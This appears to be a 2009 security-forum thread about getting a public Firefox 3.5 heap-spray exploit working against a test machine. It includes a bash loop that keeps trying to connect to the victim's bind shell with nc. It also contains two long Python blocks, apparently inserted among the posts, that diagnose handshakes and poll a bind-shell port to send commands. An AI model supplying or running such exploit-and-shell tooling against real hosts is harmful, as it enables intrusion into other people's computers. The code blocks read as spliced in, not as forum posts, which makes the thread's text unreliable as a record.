Thread: Testing an exploit - connection but no action

#1 (wolf17)

    Hey guys,

    I tried pulling an exploit off milw0rm - Mozilla Firefox 3.5 Heap Spray Exploit, to be exact - and I've gone ahead and set it up and got it running. It tells me to have someone connect on port 80, but when I do, nothing happens. Firefox just says "Failed to establish a connection".

    I've checked with nmap and the port does open, so it appears the exploit is trying to do its job. Tcpdump also shows there is an attempt at a connection of some sort.

    Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit <-- Link to the exploit I'm trying to use.

    Results from konsole:

    Listening on port 80.
    Have someone connect to you.

    Type <control>-c to exit..


    Any idea what's not working here? If you need any more info to be able to help me, let me know and I'll be glad to share.

    Thanks in advance,

    Wolf

#2 (Gitsnik)

    I'm wondering - are you making the completely un-obvious mistake of thinking that because nothing appears you have not got a connection?

    After a small amount of time, try typing "id" and hitting enter (obviously without the quotes).

    Just curious, I've seen it before (but haven't tried this one out just yet I think, so might not be the case).

    Also does tcpdump ONLY show one "attempt" at connection, or do you get the full SYN/SYN+ACK/ACK going... and then the blank screen?

#3

    Are you using a vulnerable version of the browser?

#4 (floyd)

    And don't forget to shut down Apache before starting Metasploit:

    /etc/init.d/apache2 stop

    And Gitsnik is right, do you see the SYN, SYN/ACK, ACK?
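Gitsnik and floyd both ask whether tcpdump shows the full SYN / SYN+ACK / ACK or just a lone SYN. The following Python is an added example and is not code from the thread or from the milw0rm exploit. It takes `tcpdump -n` lines (a constructed sample is embedded; the victim address 10.0.1.7 comes from the thread's own output, the attacker address 10.0.1.5 is an assumption) and reports, per connection attempt, whether the three-way handshake completed, was answered with a RST (port closed), or only ever showed SYNs with nothing coming back (what a firewall dropping the packet looks like).

```python
import re

# Matches the connection tuple and TCP flags in a `tcpdump -n` line, e.g.
#   17:18:39.100 IP 10.0.1.7.49201 > 10.0.1.5.80: Flags [S], seq 1000, ...
PKT_RE = re.compile(
    r"IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): Flags \[([^\]]*)\]"
)

# Constructed sample capture (not from the thread). 10.0.1.7 is the victim
# from the thread's output; 10.0.1.5 as the attacker box is an assumption.
# Flow 1: victim fetches the exploit page on port 80 (full handshake + data).
# Flow 2: attacker hits port 5500 after the shellcode died (SYN, then RST).
# Flow 3: attacker hits port 5500 and nothing ever answers (SYN retransmit).
SAMPLE_TCPDUMP = """\
17:18:39.100 IP 10.0.1.7.49201 > 10.0.1.5.80: Flags [S], seq 1000, win 65535, length 0
17:18:39.101 IP 10.0.1.5.80 > 10.0.1.7.49201: Flags [S.], seq 2000, ack 1001, win 5840, length 0
17:18:39.102 IP 10.0.1.7.49201 > 10.0.1.5.80: Flags [.], ack 1, win 65535, length 0
17:18:39.150 IP 10.0.1.7.49201 > 10.0.1.5.80: Flags [P.], seq 1:300, ack 1, win 65535, length 299
17:19:10.000 IP 10.0.1.5.51234 > 10.0.1.7.5500: Flags [S], seq 3000, win 5840, length 0
17:19:10.001 IP 10.0.1.7.5500 > 10.0.1.5.51234: Flags [R.], seq 0, ack 3001, win 0, length 0
17:19:12.000 IP 10.0.1.5.51235 > 10.0.1.7.5500: Flags [S], seq 4000, win 5840, length 0
17:19:13.000 IP 10.0.1.5.51235 > 10.0.1.7.5500: Flags [S], seq 4000, win 5840, length 0
""".splitlines()


def parse_packet(line):
    """Return (src, sport, dst, dport, flags) for a tcpdump TCP line, else None."""
    m = PKT_RE.search(line)
    if m is None:
        return None
    return m.group(1), int(m.group(2)), m.group(3), int(m.group(4)), m.group(5)


def _state(st):
    # Order matters: a RST after a completed handshake is just a close.
    if st["ack"]:
        return "completed"      # SYN, SYN+ACK and ACK all seen
    if st["rst"]:
        return "refused"        # server answered the SYN with RST: port closed
    if st["synack"]:
        return "synack_no_ack"  # server answered, client never finished
    return "syn_only"           # nothing came back: dropped/filtered


def classify_flows(lines):
    """Map each client-initiated flow (client, cport, server, sport) to its
    handshake state. The first bare SYN defines who is client and server."""
    flows = {}
    for line in lines:
        pkt = parse_packet(line)
        if pkt is None:
            continue
        src, sport, dst, dport, flags = pkt
        key = (src, sport, dst, dport)
        rkey = (dst, dport, src, sport)
        if "S" in flags and "." not in flags:
            # Bare SYN (retransmits land on the same key).
            flows.setdefault(key, {"synack": False, "ack": False, "rst": False})
            continue
        if key in flows:                     # client -> server
            st = flows[key]
            if "R" in flags:
                st["rst"] = True
            elif st["synack"] and "." in flags:
                st["ack"] = True
        elif rkey in flows:                  # server -> client
            st = flows[rkey]
            if "R" in flags:
                st["rst"] = True
            elif "S" in flags and "." in flags:
                st["synack"] = True
    return {k: _state(v) for k, v in flows.items()}


if __name__ == "__main__":
    for (client, cport, server, sport), state in classify_flows(SAMPLE_TCPDUMP).items():
        print("%s:%d -> %s:%d  %s" % (client, cport, server, sport, state))
```

Feed it real output with `tcpdump -n -i eth0 'tcp port 80 or tcp port 5500'` piped into `classify_flows(sys.stdin)`; a `syn_only` result on port 80 points at the attacker box's firewall, a `refused` on 5500 means the shellcode's listener is not (or no longer) there.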

#5 (wolf17): My results

    OK, so this is what I get:

    Type <control>-c to exit..
    10.0.1.7 - - [20/Sep/2009 17:18:39] "GET / HTTP/1.1" 200 -


    [-] Exploit sent... [-]
    [-] Wait about 30 seconds and attempt to connect.[-]
    [-] Connect to IP Address: 10.0.1.7 and port 5500 [-]
    10.0.1.7 - - [20/Sep/2009 17:18:40] "GET /favicon.ico HTTP/1.1" 200 -
    10.0.1.7 - - [20/Sep/2009 17:18:43] "GET /favicon.ico HTTP/1.1" 200 -
    id

    .

    I am fairly certain this is a vulnerable version I'm running, since it matches the exploit specs. Has anyone tested this out before? I'm used to running exploits with Metasploit - if I run it individually like this, are there some commands I should be using?

#6 (loop4me)

    Firefox crashes very fast on this one. So, when you start the exploit and run nmap you will get:

    nmap -sS -p 5500 192.168.1.3

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-09-21 03:01 CEST
    Interesting ports on sp3-a27ca57edb8 (192.168.1.3):
    PORT STATE SERVICE
    5500/tcp open hotline
    MAC Address: 00:0C:29:05:3B:53 (VMware)

    but only a second or less later nmap shows that the port is closed:

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-09-21 03:01 CEST
    Interesting ports on sp3-a27ca57edb8 (192.168.1.3):
    PORT STATE SERVICE
    5500/tcp closed hotline
    MAC Address: 00:0C:29:05:3B:53 (VMware)

    Code:
    [-] Wait about 30 seconds and attempt to connect.[-]
    I'm not sure about the 30 sec, so I found the solution.
    Make a loop for "nc [victim box] 5500" and start it before Firefox tries to connect to the attacker's port 80, so that port 5500 won't close before you connect to it with nc.

    Code:
    #!/bin/bash
    # Keep retrying the bind shell: the port is only open for a moment after
    # the heap spray fires, so a single manual nc can easily miss it.
    while true
    do
        nc 192.168.1.3 5500
        sleep 1
    done
    And you will get cmd with no problem, with this exploit from milw0rm.

    One more thing I forgot:
    it is a bindshell, as you can see in the exploit.
    Code:
    // windows/shell_bind_tcp - 317 byte
    So you have to connect to the port (port 5500) that opens on the victim box, as I explained in the earlier reply.
    You were probably using reverse_tcp with msf, and meterpreter.

    So,

    Quote (originally posted by wolf17):
    I'm used to running exploits with Metasploit - if I run it individually like this, are there some commands I should be using?
    It's a raw binding of a shell to a port. No meterpreter commands, just cmd. I think.

#7 (wolf17)

    Thanks for the reply.

    I tested out the nc bash script but it didn't work for me. I just get a connection timed out from nc. So still no success on this exploit for me.

    Any tips?

    Side note to others: be sure to check your iptables! My original troubles in this were a result of previous iptables settings.

    Hopefully this isn't the case... the sploit says version 3.5 - I'm on 3.5.3...?
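loop4me's point is that port 5500 is only open for a moment, and wolf17's follow-up is that even a retry loop gives "connection timed out". Those two failures look different on the wire, and the following Python (an added example, not code from the thread or from the milw0rm exploit, which is itself a Python script) polls the bind-shell port and separates them: "refused" means a RST came back, so nothing is listening right now; "timeout" means nothing answered at all, which with an iptables rule in the way is exactly what you get. The victim listener it connects to is a constructed stand-in that starts listening late and echoes one command, so the example runs offline; the hostname, ports and delay are assumptions.

```python
import socket
import threading
import time


def try_connect(host, port, connect_timeout=1.0):
    """One TCP connect attempt. Returns (sock, None) on success, otherwise
    (None, reason) with reason 'refused' (a RST came back: nothing is
    listening on the port right now), 'timeout' (no answer at all: a firewall
    dropping the SYN looks like this) or 'error' (anything else)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(connect_timeout)
    try:
        s.connect((host, port))
    except socket.timeout:
        s.close()
        return None, "timeout"
    except ConnectionRefusedError:
        s.close()
        return None, "refused"
    except OSError:
        s.close()
        return None, "error"
    s.settimeout(None)
    return s, None


def wait_for_bind_shell(host, port, total_timeout=30.0, interval=0.2):
    """Poll the bind-shell port until it accepts or the deadline passes.
    Returns a dict with the connected socket (or None), the number of
    attempts made and the reason the last attempt failed."""
    deadline = time.monotonic() + total_timeout
    attempts, last_reason = 0, None
    while time.monotonic() < deadline:
        attempts += 1
        sock, reason = try_connect(host, port)
        if sock is not None:
            return {"sock": sock, "attempts": attempts, "last_reason": None}
        last_reason = reason
        time.sleep(interval)
    return {"sock": None, "attempts": attempts, "last_reason": last_reason}


def run_command(sock, cmd, read_timeout=1.0):
    """Send one command line to the raw cmd.exe behind the port and return
    whatever bytes come back before the read times out or the peer closes.
    There is no meterpreter protocol here, only bytes in and bytes out."""
    sock.sendall(cmd.encode() + b"\r\n")
    sock.settimeout(read_timeout)
    chunks = []
    try:
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    except socket.timeout:
        pass
    return b"".join(chunks)


def start_fake_bind_shell(delay=1.0):
    """Constructed stand-in for the victim (hypothetical, so the example runs
    offline): owns a loopback port but only starts listening after `delay`
    seconds, the way the shellcode's listener only exists once the spray has
    fired. Connects before that are refused. It answers one command by
    echoing it behind a fake prompt, then closes. Returns the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    port = srv.getsockname()[1]

    def serve():
        time.sleep(delay)
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            conn.sendall(b"Microsoft Windows [Version 5.1.2600]\r\n")
            line = conn.recv(1024).rstrip(b"\r\n")
            conn.sendall(b"C:\\>" + line + b"\r\n")
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def reserve_closed_port():
    """Bind (but never listen on) a loopback port so connects to it are
    refused for as long as the returned socket stays open."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    return s, s.getsockname()[1]


if __name__ == "__main__":
    port = start_fake_bind_shell(delay=1.0)
    result = wait_for_bind_shell("127.0.0.1", port, total_timeout=10.0)
    if result["sock"] is None:
        print("no shell after %d attempts, last error: %s"
              % (result["attempts"], result["last_reason"]))
    else:
        print("connected after %d attempts" % result["attempts"])
        print(run_command(result["sock"], "id").decode(errors="replace"))
        result["sock"].close()
```

Against a real target replace the fake listener with the victim's address and port 5500 and start the poll before Firefox loads the page. A run that ends with `last_reason == "refused"` means the port never opened or had already closed (wrong browser version, or the shellcode died with the process); one that ends with `"timeout"` means the SYNs are being dropped, so look at iptables on both ends before blaming the exploit.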

#8

    Quote (originally posted by wolf17):
    Hopefully this isn't the case... the sploit says version 3.5 - I'm on 3.5.3...?
    Isn't that the latest release? If so, it's probably not vulnerable.

    edit: http://blog.mozilla.com/security/200...in-firefox-35/

    Update: This vulnerability has been fixed in Firefox 3.5.1, released Thursday, July 16, 2009

#9 (wolf17)

    Thanks for the link.

    Yep, seems it's patched.
